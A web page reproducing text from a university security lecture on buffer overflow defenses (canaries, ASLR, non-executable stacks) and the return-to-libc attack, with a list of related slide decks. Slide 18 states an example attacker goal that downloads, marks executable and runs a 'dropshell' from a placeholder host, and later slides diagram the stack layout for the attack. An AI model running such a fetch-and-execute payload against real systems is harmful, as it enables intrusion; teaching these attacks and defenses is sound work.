Video Converter
Audio Converter
Image Converter
PDF Converter
File Compressor
buffer overflow defenses countermeasures

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 - PowerPoint PPT Presentation

Aug 01, 2023 •174 likes •1.12k views

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 2018 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Finding the return address (guess the raw address)

  1. BUFFER OVERFLOW 
 DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 2018

  2. RECALL OUR CHALLENGES How can we make these even more difficult? • Putting code into the memory (no zeroes) 
 • Finding the return address (guess the raw address) 
 • Getting %eip to point to our code (dist buff to stored eip)

  3. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 00 00 00 00 … buffer

  4. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 00 00 00 00 … buffer

  5. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 00 00 00 00 02 8d e2 10 … buffer canary

  6. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary

  7. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary

  8. DETECTING OVERFLOWS WITH CANARIES Not the expected value: abort %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary

  9. DETECTING OVERFLOWS WITH CANARIES Not the expected value: abort %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary What value should the canary have?

  10. CANARY VALUES From StackGuard [Wagle & Cowan] 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new random value @ each process start • Save the real value somewhere in memory • Must write-protect the stored value 3. Random XOR canaries • Same as random canaries • But store canary XOR some control info, instead

  11. RECALL OUR CHALLENGES How can we make these even more difficult? • Putting code into the memory (no zeroes) 
 Option: Make this detectable with canaries • Finding the return address (guess the raw address) 
 • Getting %eip to point to our code (dist buff to stored eip)

  12. ADDRESS SPACE LAYOUT RANDOMIZATION 4G 0xffffffff Set when 
 cmdline & env process starts int f() { 
 Stack int x; … Runtime Heap malloc(sizeof(long)); Uninit’d data static int x; Known at Init’d data static const int y=10; compile time Text 0 0x00000000 Randomize where exactly these regions start

  13. ADDRESS SPACE LAYOUT RANDOMIZATION Shortcomings of ASLR • Introduces return-to-libc atk • Probes for location of usleep • On 32-bit architectures, 
 only 16 bits of entropy • fork() keeps same offsets

  14. RECALL OUR CHALLENGES How can we make these even more difficult? • Putting code into the memory (no zeroes) 
 Option: Make this detectable with canaries • Finding the return address (guess the raw address) 
 Address Space Layout Randomization ( ASLR ) • Getting %eip to point to our code (dist buff to stored eip)

  15. GETTING %EIP TO POINT TO OUR CODE Recall that all memory has Read, Write, and Execute permissions 4G 0xffffffff cmdline & env Stack Must be 
 But does it 
 readable & 
 need to be 
 writeable executable? Heap Basic idea: 
 Uninit’d data make the stack 
 Init’d data non-executable Must be 
 Text executable 0 0x00000000

  16. RETURN TO LIBC Exploit:

  17. RETURN TO LIBC Exploit: Preferred: strlcpy char buf[4]; 
 strncpy(buf, “hello!”, sizeof(buf)); 
 buf = {‘h’, ‘e’, ‘l’, ‘l’} strlcpy(buf, “hello!”, sizeof(buf)); buf = {‘h’, ‘e’, ‘l’, ‘\0’}

  18. RETURN TO LIBC Exploit: Goal: system(“wget http://www.example.com/dropshell ; 
 chmod +x dropshell ; 
 ./dropshell”); Non-executable stack Challenge: “ system ” already exists somewhere in libc Insight:

  19. RETURN TO LIBC text ... %eip &arg1 %ebp 00 00 00 00 … buffer stack frame %eip

  20. RETURN TO LIBC padding text ... %eip &arg1 %ebp 00 00 00 00 … 0xbdf 0xbdf 0xbdf ... buffer stack frame %eip

  21. RETURN TO LIBC good 
 guess padding text ... %eip &arg1 %ebp 00 00 00 00 … 0xbdf 0xbdf 0xbdf ... buffer stack frame %eip

  22. RETURN TO LIBC good 
 nop sled guess padding text ... %eip &arg1 %ebp 00 00 00 00 … 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip

  23. RETURN TO LIBC good 
 nop sled guess padding malicious code text ... %eip &arg1 %ebp 00 00 00 00 … \x0f \x3c \x2f ... 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip

  24. RETURN TO LIBC good 
 nop sled guess padding malicious code text ... %eip &arg1 %ebp 00 00 00 00 … \x0f \x3c \x2f ... 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip

  25. RETURN TO LIBC good 
 nop sled guess padding malicious code text ... %eip &arg1 %ebp 00 00 00 00 … \x0f \x3c \x2f ... 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip PANIC: address not executable

  26. RETURN TO LIBC libc ... ... ... usleep() printf() system() text ... %eip &arg1 %ebp 00 00 00 00 … buffer %eip

  27. RETURN TO LIBC libc ... ... ... usleep() printf() system() padding text ... %eip &arg1 %ebp 00 00 00 00 … buffer %eip

  28. RETURN TO LIBC libc ... ... ... usleep() printf() system() padding text ... %eip &arg1 %ebp 00 00 00 00 … buffer %eip

  29. RETURN TO LIBC libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip

  30. RETURN TO LIBC libc ... ... ... usleep() printf() system() How do we guess this address? padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip

  31. RETURN TO LIBC libc ... ... ... usleep() printf() system() How do we guess this address? padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer How do we ensure these are the args? %eip

  32. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip %esp %ebp leave : mov %ebp %esp pop %ebp ret : pop %eip

  33. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip %esp %ebp leave : mov %ebp %esp pop %ebp ret : pop %eip

  34. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %eip %esp %ebp leave : mov %ebp %esp pop %ebp ret : pop %eip

  35. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %eip %ebp leave : mov %ebp %esp pop %ebp %esp ret : pop %eip

  36. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %eip %ebp %esp leave : mov %ebp %esp pop %ebp ret : pop %eip

  37. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %ebp %eip %esp leave : mov %ebp %esp pop %ebp ret : pop %eip At this point, we can’t reliably access local variables

  38. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %ebp %eip %esp leave : mov %ebp %esp pop %ebp ret : pop %eip At this point, we can’t reliably access local variables

  39. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %ebp %esp leave : mov %ebp %esp pop %ebp ret : pop %eip

  40. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF DEADBEEF buffer %ebp %esp leave : mov %ebp %esp pop %ebp ret : pop %eip

  41. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF DEADBEEF buffer %esp %ebp

  42. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() Will expect args at 8(%ebp) padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF DEADBEEF buffer %esp %ebp

Recommend

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow

Last time We finished up By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow defenses (and workarounds) Format string vulnerabilities Integer overflow vulnerabilities This time

1.3k views • 80 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow

Last time We continued By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow attacks & other vulnerabilities Overflow defenses Everything youve always wanted to know about

2.42k views • 197 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

This time We will continue By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything youve always wanted to know about gdb but were too afraid to ask Overflow defenses Other memory

1.23k views • 95 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

This time We will continue By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything youve always wanted to know about gdb but were too afraid to ask Overflow defenses Other memory

1.49k views • 117 slides
Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a very common attack mechanism from 1988 Morris Worm to Code Red, Slammer, Sasser and many others prevention techniques known still of major concern

876 views • 53 slides
Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by

Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by

Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by the Morris Worm in 1988 Prevention techniques known NX bit, stack canaries, ASLR Still of major concern Recent examples:

360 views • 21 slides
CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking

CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking

CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking & Loading, continued Buffer Overflow Read: CSAPP2: section 3.12: out-of-bounds memory references & buffer overflow K&R:

777 views • 43 slides
Buffer Overflow CS461/ECE422 Spring 2012 Reading Material

Buffer Overflow CS461/ECE422 Spring 2012 Reading Material

Buffer Overflow CS461/ECE422 Spring 2012 Reading Material Based on Chapter 11 of the text Outline Buffer Overflow Stack Buffer Overflow Shell

785 views • 28 slides
Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow

Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow

Last time We continued By launching our 1st section: Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow fundamentals This time We will finish up By looking at Buffer Overflow overflows

1.33k views • 103 slides
Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed

Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed

1 Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed in buffer overflow exploits to create backdoors Execution of additional network services via the INETD daemon The addition of new users

497 views • 30 slides
a single gadget weird machine Framing Signals a return to portable shellcode Erik Bosman and

a single gadget weird machine Framing Signals a return to portable shellcode Erik Bosman and

a single gadget weird machine Framing Signals a return to portable shellcode Erik Bosman and Herbert Bos stack buffer overflow stack return addr buffer sp 1 stack buffer overflow stack return addr buffer sp 1 stack buffer overflow

1.65k views • 89 slides
Buffer overflow defenses Deian Stefan Some slides adopted from Nadia Heninger, Kirill Levchenko,

Buffer overflow defenses Deian Stefan Some slides adopted from Nadia Heninger, Kirill Levchenko,

CSE 127: Computer Security Buffer overflow defenses Deian Stefan Some slides adopted from Nadia Heninger, Kirill Levchenko, Stefan Savage, and Stephen Checkoway Today: mitigating buffer overflows Lecture objectives: Understand how to

1.33k views • 130 slides
Internet Outbreaks: Internet Outbreaks: Epidemiology and Defenses Epidemiology and Defenses

Internet Outbreaks: Internet Outbreaks: Epidemiology and Defenses Epidemiology and Defenses

Internet Outbreaks: Internet Outbreaks: Epidemiology and Defenses Epidemiology and Defenses Stefan Savage Stefan Savage Collaborative Center for Internet Epidemiology and Defenses Collaborative Center for Internet Epidemiology and Defenses

762 views • 58 slides
VOTD: Buffer Overflow Engineering Secure Software Last Revised: August 17, 2020 SWEN-331:

VOTD: Buffer Overflow Engineering Secure Software Last Revised: August 17, 2020 SWEN-331:

VOTD: Buffer Overflow Engineering Secure Software Last Revised: August 17, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 What is Buffer Overflow? Writing data outside of the intended buffer (memory space) SWEN-331:

298 views • 6 slides
IT 4500 : Information Security Secure Programming Dr Joe Francom Buffer Overflow What it is? A

IT 4500 : Information Security Secure Programming Dr Joe Francom Buffer Overflow What it is? A

IT 4500 : Information Security Secure Programming Dr Joe Francom Buffer Overflow What it is? A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold.

225 views • 3 slides
Delta Pointers: Buffer Overflow Checks Without the Checks Tadde us Kroes & Koen Koning

Delta Pointers: Buffer Overflow Checks Without the Checks Tadde us Kroes & Koen Koning

Delta Pointers: Buffer Overflow Checks Without the Checks Tadde us Kroes & Koen Koning Erik van der Kouwe Herbert Bos Cristiano Giuffrida June 19, 2018 Preview buffer[10] secret 2 Preview buffer[10] secret buffer[5] 2 Preview

940 views • 74 slides
Designing costless abstractions Bart Verhagen bart@verhagenconsultancy.be 16 November 2019

Designing costless abstractions Bart Verhagen bart@verhagenconsultancy.be 16 November 2019

Designing costless abstractions Bart Verhagen bart@verhagenconsultancy.be 16 November 2019 Introduction Definitions What??? xkcd. Is It Worth the Time? url : https://xkcd.com/1205/ Introduction Definitions Costless abstractions Software

452 views • 32 slides
Dyninst Scalable Tools Workshop Granlibakken Resort Lake Tahoe, California Dyninst Scalable

Dyninst Scalable Tools Workshop Granlibakken Resort Lake Tahoe, California Dyninst Scalable

Dyninst Scalable Tools Workshop Granlibakken Resort Lake Tahoe, California Dyninst Scalable Tools Workshop A Brief Introduction to Dyninst Dyninst: a tool for static and dynamic binary instrumentation and modification 2 Dyninst Scalable

711 views • 47 slides
Electronic Business Documents UBL v2.1 Building on the Foundation 1 (2014-11-21 13:20z) OASIS

Electronic Business Documents UBL v2.1 Building on the Foundation 1 (2014-11-21 13:20z) OASIS

OASIS Universal Business Language Electronic Business Documents UBL v2.1 Building on the Foundation 1 (2014-11-21 13:20z) OASIS Universal Business Language Innovative Uses of UBL Today sourcing, procurement, replenishment pre-award and

374 views • 6 slides
JANUARY 2020 TELEPHONE DO NOT USE COMPUTER AUDIO REGIONAL CALLS PARTICIPATE IN DISCUSSION

JANUARY 2020 TELEPHONE DO NOT USE COMPUTER AUDIO REGIONAL CALLS PARTICIPATE IN DISCUSSION

PLEASE CALL IN USING A JANUARY 2020 TELEPHONE DO NOT USE COMPUTER AUDIO REGIONAL CALLS PARTICIPATE IN DISCUSSION BY UNMUTING YOUR PHONE OR USING THE WEBINAR PANEL Your code and Audio PIN are here Agenda Legislative Update DOE

376 views • 23 slides
Equity & inclusion as a way of developing diverse, resilient, and more relevant open source

Equity & inclusion as a way of developing diverse, resilient, and more relevant open source

Equity & inclusion as a way of developing diverse, resilient, and more relevant open source software Griselda Cuevas | Aizhamal Nurmamat kyzy Airflow Summit July 6-17, 2020 What we will discuss Common challenges for Open Source

690 views • 58 slides
Introduction Synopsis 1 #include <sys/ptrace.h> long int ptrace(enum __ptrace_request

Introduction Synopsis 1 #include <sys/ptrace.h> long int ptrace(enum __ptrace_request

System Call Tracing using ptrace 1/15/04 Ptrace Introduction Synopsis 1 #include <sys/ptrace.h> long int ptrace(enum __ptrace_request request , pid_t pid , void * addr , void * data ) Description 2 The ptrace system call provides

383 views • 6 slides
CE Report Workplace Climate and Environment Previously known as EDI Now a user initiative

CE Report Workplace Climate and Environment Previously known as EDI Now a user initiative

CE Report Workplace Climate and Environment Previously known as EDI Now a user initiative with UEC+FSPA+General Users. Main objectives Host a seminar series centered around workplace climate issues like diversity, equity,

479 views • 4 slides
1 NSERC Information Session Scholarships and Fellowships 2018-2019 Trent University Sarah

1 NSERC Information Session Scholarships and Fellowships 2018-2019 Trent University Sarah

1 NSERC Information Session Scholarships and Fellowships 2018-2019 Trent University Sarah Smith & Kevin Belanger September 18th, 2018 2 Agenda EDI initiatives at NSERC Postgraduate programs Postdoctoral programs How to

1.2k views • 82 slides

More recommend

Explore More Topics

Stay informed with curated content and fresh updates.

animals pets art culture automotive transportation business finance computer internet construction architecture education-career electronics communication

Logo Sambuz

Unleash a World of Digital Possibilities—Browse, Share, and Explore Content Without Boundaries

Useful Links

About Us Privacy Services FAQ's Contact

Newsletter

Stay Informed & Inspired—Subscribe for the Latest Updates, Tips, and Exclusive Content Directly to Your Inbox.

Mail Us

mail@sambuz.com

2026 SAMBUZ, All right reserved.